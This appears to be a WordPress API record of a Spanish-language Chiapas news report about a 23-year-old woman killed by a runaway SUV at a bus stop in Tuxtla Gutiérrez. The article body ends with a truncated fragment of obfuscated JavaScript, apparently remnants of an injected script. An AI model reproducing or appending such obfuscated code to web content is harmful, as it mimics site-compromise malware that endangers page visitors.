{"id":23720,"date":"2025-09-02T05:04:12","date_gmt":"2025-09-02T05:04:12","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23720"},"modified":"2025-09-02T05:04:13","modified_gmt":"2025-09-02T05:04:13","slug":"confirman-fallecimiento-de-laura-la-cual-atropellada-en-la-colonia-27-de-febrero","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23720","title":{"rendered":"Confirman fallecimiento de Laura, la cual atropellada en la colonia 27 de Febrero"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" data-id=\"23722\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000310627-576x1024.jpg\" alt=\"\" class=\"wp-image-23722\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000310627-576x1024.jpg 576w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000310627-169x300.jpg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000310627-768x1365.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000310627-864x1536.jpg 864w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000310627.jpg 1152w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" data-id=\"23721\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000310628-576x1024.jpg\" alt=\"\" class=\"wp-image-23721\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000310628-576x1024.jpg 576w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000310628-169x300.jpg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000310628-768x1365.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000310628-864x1536.jpg 864w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000310628.jpg 1152w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Agencia Reporte Ciudadano. Tuxtla Guti\u00e9rrez. Elvia Laura &#8220;N&#8221; de 23 a\u00f1os , originaria de colonia Miguel Hidalgo del municipio de Chiapa de Corzo fue la mujer que falleci\u00f3 en el Hospital Gilberto G\u00f3mez Maza luego de ser atropellada por una camioneta en la colonia 27 de Febrero de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>El dato, la persona se encontraba esperando su colectivo cuando fue arrollada por una SUV marca Renault tipo duster de color rojo que se encontraba parqueada pero &#8220;bot\u00f3&#8221; la velocidad y en su trayecto atropell\u00f3 a la dama.<\/p>\n\n\n\n<p>El hecho ocurri\u00f3 en la avenida Ernesto Cedillo y calle Vicente Su\u00e1rez de la citada colonia.<\/p>\n\n\n\n<p>Trascendi\u00f3 que la lesionada presentaba diferentes heridas internas, por lo que al ser atendidas perdi\u00f3 la vida.<\/p>\n\n\n\n<p>Autoridades ya realizan las diligencias correspondientes para fincar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Agencia Reporte Ciudadano. Tuxtla Guti\u00e9rrez. Elvia Laura &#8220;N&#8221; de 23 a\u00f1os , originaria de colonia Miguel Hidalgo del municipio de Chiapa de Corzo fue la mujer que falleci\u00f3 en el Hospital Gilberto G\u00f3mez Maza luego de ser atropellada por una camioneta en la colonia 27 de Febrero de Tuxtla Guti\u00e9rrez. El dato, la persona se &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23722,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-23720","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23720","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23720"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23720\/revisions"}],"predecessor-version":[{"id":23723,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23720\/revisions\/23723"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23722"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23720"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23720"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23720"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}